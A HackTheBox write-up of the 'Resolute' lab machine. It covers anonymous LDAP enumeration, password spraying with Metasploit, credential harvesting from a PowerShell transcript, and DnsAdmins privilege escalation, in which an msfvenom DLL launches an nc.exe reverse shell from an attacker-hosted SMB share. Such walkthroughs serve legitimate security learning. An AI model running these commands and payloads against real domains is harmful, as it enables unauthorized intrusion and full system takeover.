< Go back

Resolute Writeup (HackTheBox)

🗓️ Published:

Table of Contents

Enumeration #

As usual, we begin with an nmap scan.

msaxena@Mayur-Laptop:~$ sudo nmap -Pn -sS -p1-10000 -T4 -sV 10.10.10.169
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-30 02:07:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing

With this box looking like a domain controller, I started off by trying anonymously accessing LDAP. First, although nmap gave a domain name (megabank.local), I ran my own query just to confirm that.

msaxena@Mayur-Laptop:~$ ldapsearch -x -h 10.10.10.169 -s base namingContexts
...
dn:
namingContexts: DC=megabank,DC=local
namingContexts: CN=Configuration,DC=megabank,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
namingContexts: DC=ForestDnsZones,DC=megabank,DC=local
...

With megabank.local confirmed, an anonymous bind followed. This command definitely worked, outputting about 6,800 lines of data. Of most interest to me was the following snippet

msaxena@Mayur-Laptop:~$ ldapsearch -x -h 10.10.10.169 -D '' -w '' -b "DC=megabank,DC=LOCAL" | tee ldap.txt
...
# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Marko Novak
sn: Novak
description: Account created. Password set to W********!
givenName: Marko
distinguishedName: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,D
C=local
instanceType: 4
whenCreated: 20190927131714.0Z
whenChanged: 20191203132427.0Z
displayName: Marko Novak
uSNCreated: 13110
uSNChanged: 69792
name: Marko Novak
objectGUID:: 8oIRSXQNmEW4iTLjzuwCpw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132140638345690606
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWVwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: marko
sAMAccountType: 805306368
userPrincipalName: marko@megabank.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927131714.0Z
dSCorePropagationData: 16010101000001.0Z
...

User #

Within the description of the account there was a default password for the account! Unfortunately, the login marko / W****! did not work when authenticating against SMB.

msaxena@Mayur-Laptop:~$ smbmap -u marko -p 'W********!' -d megabank -H 10.10.10.169
[!] Authentication error on 10.10.10.169

Within this LDAP dump, there were plenty of other domain users, so I decided to try this password against all the other known users in the domain using msfconsole.

msaxena@Mayur-Laptop:~$ grep samAccountName ldap.txt -i | cut -d ' ' -f2
...
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
msaxena@Mayur-Laptop:~$ cat users.txt
**SAME USERS AS ABOVE**
msaxena@Mayur-Laptop:~$ msfconsole
...
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.169
RHOSTS => 10.10.10.169
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain megabank
SMBDomain => megabank
msf5 auxiliary(scanner/smb/smb_login) > set SMBPass 'W********!'
SMBPass => W********!
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE users.txt
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\ryan:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\marko:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\sunita:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\abigail:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\marcus:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\sally:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\fred:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\angela:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\felicia:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\gustavo:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\ulf:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\stevie:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\claire:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\paulo:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\steve:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\annette:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\annika:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\per:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\claude:W********!',
[+] 10.10.10.169:445 - 10.10.10.169:445 - Success: 'megabank\melanie:W********!'
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\zach:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\simon:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\naoki:W********!',
[*] 10.10.10.169:445 - Scanned 1 of 1 hosts (100% complete)

So the login for melanie worked! Confirming this result for ourselves, we see that it is true.

msaxena@Mayur-Laptop:~$ smbmap -H 10.10.10.169 -u 'melanie' -d 'megabank' -p 'W********!'
[+] IP: 10.10.10.169:445 Name: 10.10.10.169
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share

Let's see what else we know about her from LDAP.

# Melanie Purkis, Users, megabank.local
dn: CN=Melanie Purkis,CN=Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Melanie Purkis
distinguishedName: CN=Melanie Purkis,CN=Users,DC=megabank,DC=local
instanceType: 4
whenCreated: 20191204103845.0Z
whenChanged: 20200530091504.0Z
uSNCreated: 131130
memberOf: CN=Remote Management Users,CN=Builtin,DC=megabank,DC=local
uSNChanged: 148093
name: Melanie Purkis
objectGUID:: XYoyZXBbZk6QBuoYRsNkAg==
userAccountControl: 512
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
logonHours:: ////////////////////////////
pwdLastSet: 132353037047984863
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWdScAAA==
accountExpires: 0
logonCount: 0
sAMAccountName: melanie
sAMAccountType: 805306368
userPrincipalName: melanie@megabank.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132353034212198387

We can see that she is a member of the Remote Management Users group. Looking back at our port scan, WinRM is indeed enabled on port 5985, so we can try logging in.

msaxena@Mayur-Laptop:~$ pwsh
...
PS /home/msaxena> Enter-PSSession 10.10.10.169 -Credential megabank\melanie -Authentication Negotiate

PowerShell credential request
Enter your credentials.
Password for user megabank\melanie: ***********

[10.10.10.169]: PS C:\Users\melanie\Documents> dir
[10.10.10.169]: PS C:\Users\melanie\Documents> dir ..\Desktop


Directory: C:\Users\melanie\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:33 AM 32 user.txt


[10.10.10.169]: PS C:\Users\melanie\Documents> type ..\Desktop\user.txt
0c3be4........978540

Second User #

This was actually really painfully slow, so after getting the flag I switched to using evil-winrm to start the recon process for the path towards admin.

msaxena@Mayur-Laptop:~$ evil-winrm -i 10.10.10.169 -u 'megabank\melanie' -p 'W********!'

I started by listing the processes, just to get an idea of what I was walking in to.

*Evil-WinRM* PS C:\Users\melanie\Documents> Get-Process

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
40 3 1524 2292 1676 1 cmd
110 9 5336 11168 1652 1 conhost
289 13 1864 4248 364 0 csrss
150 13 1388 6884 444 1 csrss
353 32 13412 22052 1168 0 dfsrs
130 8 1692 5360 1104 0 dfssvc
214 13 3652 12604 2396 0 dllhost
5311 3694 68996 68000 3820 0 dns
0 0 0 4 0 0 Idle
123 12 1984 5356 1424 0 ismserv
2912 182 48256 62772 568 0 lsass
473 39 55292 72108 1060 0 Microsoft.ActiveDirectory.WebServices
132 9 2108 7920 2024 0 MpCmdRun
190 12 2472 9440 2492 0 msdtc
492 59 130400 122576 1672 0 MsMpEng
276 10 4184 9336 552 0 services
51 2 368 1212 268 0 smss
1092 41 17580 36124 72 0 svchost
396 34 7052 13644 360 0 svchost
376 14 3020 9760 740 0 svchost
433 18 3080 8512 800 0 svchost
378 15 9496 14316 908 0 svchost
706 24 5884 14060 916 0 svchost
625 42 12776 26200 964 0 svchost
136 11 1380 6596 1096 0 svchost
201 12 2044 7972 1764 0 svchost
261 16 5784 14660 2016 0 svchost
100 7 1748 7280 3080 0 svchost
276 19 8620 14592 3692 0 svchost
796 0 128 144 4 0 System
164 11 1768 9112 2332 1 taskhostw
196 16 2372 10672 2248 0 vds
146 11 3040 9980 1392 0 VGAuthService
317 21 9508 22036 1332 0 vmtoolsd
170 15 3344 12780 2764 1 vmtoolsd
92 8 944 4912 432 0 wininit
186 9 1964 8976 508 1 winlogon
286 14 7376 15816 2532 0 WmiPrvSE
691 26 56872 74480 0.92 668 0 wsmprovhost
852 31 60564 84000 1004 0 wsmprovhost
584 26 58920 76508 2.22 1444 0 wsmprovhost
232 17 28768 26160 0.08 3372 0 wsmprovhost
617 30 196584 220720 60.22 3576 0 wsmprovhost
740 26 58860 78628 3816 0 wsmprovhost

Not much to note here, but MsMpEng is running, meaning Windows Defender is active on the box - good to know.

Then, I began working my way up the directories and listing the contents, making sure that I was viewing hidden files and folders as well using -Force.

*Evil-WinRM* PS C:\Users\melanie\Documents> cd C:\Users
*Evil-WinRM* PS C:\Users> Get-ChildItem -Force


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d--hsl 7/16/2016 6:28 AM All Users
d-rh-- 9/25/2019 10:17 AM Default
d--hsl 7/16/2016 6:28 AM Default User
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan
-a-hs- 7/16/2016 6:16 AM 174 desktop.ini

*Evil-WinRM* PS C:\> cd C:\Users\ryan
*Evil-WinRM* PS C:\Users\ryan> dir
Access to the path 'C:\Users\ryan' is denied.
At line:1 char:1
+ dir
+ ~~~
+ CategoryInfo : PermissionDenied: (C:\Users\ryan:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

As it turns out, there was a second user (ryan) on the box, and although I didn't expect to be able to, I still tried to view the contents of his user directory (with no luck).

*Evil-WinRM* PS C:\> cd C:\\
*Evil-WinRM* PS C:\> Get-ChildItem -Force


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 5/30/2020 12:38 AM 402653184 pagefile.sys

The PSTranscripts directory isn't normally there, let's see what's inside.

*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> Get-ChildItem -Force


Directory: C:\PSTranscripts


Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203


*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> Get-ChildItem -Force


Directory: C:\PSTranscripts\20191203


Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"

>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan S********!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"

>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
...

This file contains a history of executed commands, and there is what looks like a password the ryan account

Here's what we know about Ryan from LDAP:

# Ryan Bertrand, Contractors, MegaBank Users, megabank.local
dn: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Bertrand
sn: Bertrand
givenName: Ryan
distinguishedName: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megaba
 nk,DC=local
instanceType: 4
whenCreated: 20190927105650.0Z
whenChanged: 20200530091504.0Z
displayName: Ryan Bertrand
uSNCreated: 13048
memberOf: CN=Contractors,OU=Groups,DC=megabank,DC=local
uSNChanged: 148091
name: Ryan Bertrand
objectGUID:: 44OMhL5sPk26z6p7032mkQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
logonHours:: ////////////////////////////
pwdLastSet: 132353037041110259
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWUQQAAA==
accountExpires: 0
logonCount: 0
sAMAccountName: ryan
sAMAccountType: 805306368
userPrincipalName: ryan@megabank.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927105650.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132352980496311688
msDS-SupportedEncryptionTypes: 0

He's a member of the Contractors group, and what do we know about that group?

# Contractors, Groups, megabank.local
dn: CN=Contractors,OU=Groups,DC=megabank,DC=local
objectClass: top
objectClass: group
cn: Contractors
description: Contractors
member: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
distinguishedName: CN=Contractors,OU=Groups,DC=megabank,DC=local
instanceType: 4
whenCreated: 20190926123745.0Z
whenChanged: 20190927140221.0Z
displayName: Contractors
uSNCreated: 12887
memberOf: CN=DnsAdmins,CN=Users,DC=megabank,DC=local
memberOf: CN=Remote Management Users,CN=Builtin,DC=megabank,DC=local
uSNChanged: 16397
name: Contractors
objectGUID:: vvcvnwX4H0mv8TZTZTh01w==
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWTwQAAA==
sAMAccountName: Contractors
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927105218.0Z
dSCorePropagationData: 16010101000417.0Z

That group is part of the Remote Management Users group (meaning we can use WinRM), and also part of another group called DnsAdmins. Knowing that we can login over WinRM, let's take a quick peek at his user directory.

msaxena@Mayur-Laptop:~$ evil-winrm -i 10.10.10.169 -u 'megabank\ryan' -p 'S********!'
...
*Evil-WinRM* PS C:\Users\ryan\Documents> dir
*Evil-WinRM* PS C:\Users\ryan\Documents> dir ..\Desktop


Directory: C:\Users\ryan\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt


*Evil-WinRM* PS C:\Users\ryan\Documents> type ..\Desktop\note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

Privilege Escalation #

OK, so where to go from here? Since this was an Active Directory themed box, I figured I was supposed to do something with the group memberships... and I was also just curious what the DnsAdmins group was for. After some searching, I found articles here and here about privilege escalation from this group.

In a nutshell, since we're a member of DnsAdmins, we can manage DNS server objects (this domain controller in this case). We're going to be telling the DNS sever service to load a DLL of our choosing, and because it runs as SYSTEM, we have SYSTEM level code execution.

Step 1. Determine Architecture #

First we need to determine whether our target is running a 32-bit or 64-bit OS. We can do this with the following PowerShell command:

*Evil-WinRM* PS C:\Users\ryan\Documents> [System.Environment]::Is64BitOperatingSystem
True

Step 2. Build Payload #

Now, we can use msfvenom to build a 64-bit Windows DLL that runs an arbitrary Windows command. Our command will be to run nc.exe off an SMB share that we control and create a reverse shell that connects back to us.

msaxena@Mayur-Laptop:~$ msfvenom -p windows/x64/exec -f dll CMD='\\10.10.14.15\MYSHARE\nc.exe 10.10.14.15 4443 -e cmd.exe' > parsnips.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 5120 bytes

Step 3. Host an SMB share #

We're going to use this SMB share to serve both the DLL we just created and the nc.exe binary. To do so, we'll use smbserver.py from Impacket.

msaxena@Mayur-Laptop:~$ sudo python3 ~/impacket/examples/smbserver.py -debug MYSHARE .

Step 4. Listen for the reverse shell #

Of course, don't forget to spin up a nc listener for the reverse shell we're expecting.

msaxena@Mayur-Laptop:~$ nc -nlvp 4443
listening on [any] 4443 ...

Step 5. Configure and restart DNS service #

On the Windows machine now, using our WinRM session as ryan, we can configure the service to load our DLL.

*Evil-WinRM* PS C:\> dnscmd resolute /config /serverlevelplugindll \\10.10.14.15\MYSHARE\parsnips.dll

We can check if this command worked like so:

*Evil-WinRM* PS C:\> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll


ServerLevelPluginDll : \\10.10.14.15\MYSHARE\parnsips.dll
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName : Parameters
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry

Once everything is in place, we just restart the dns service.

*Evil-WinRM* PS C:\> sc.exe \\resolute stop dns
*Evil-WinRM* PS C:\> sc.exe \\resolute start dns

Step 6. Pwnage #

Back on our Kali box, we should have caught our reverse shell. Keeping in mind slight delays due to SMB, if you haven't caught one, check the Impacket debug output for any clues. It could also be the case that Windows Defender flagged some aspect of the payload or callback, so maybe try simplifying the command to be executed (for example, creating a new domain administrator).

...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.169] 50436
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d948........5e619c

With the root flag in hand, we're now done! Our binaries were all hosted on our SMB share and based on the note we found on ryan's Desktop, the DNS server service will reset the changes that we made - so there's no cleanup to do.

^ Back to top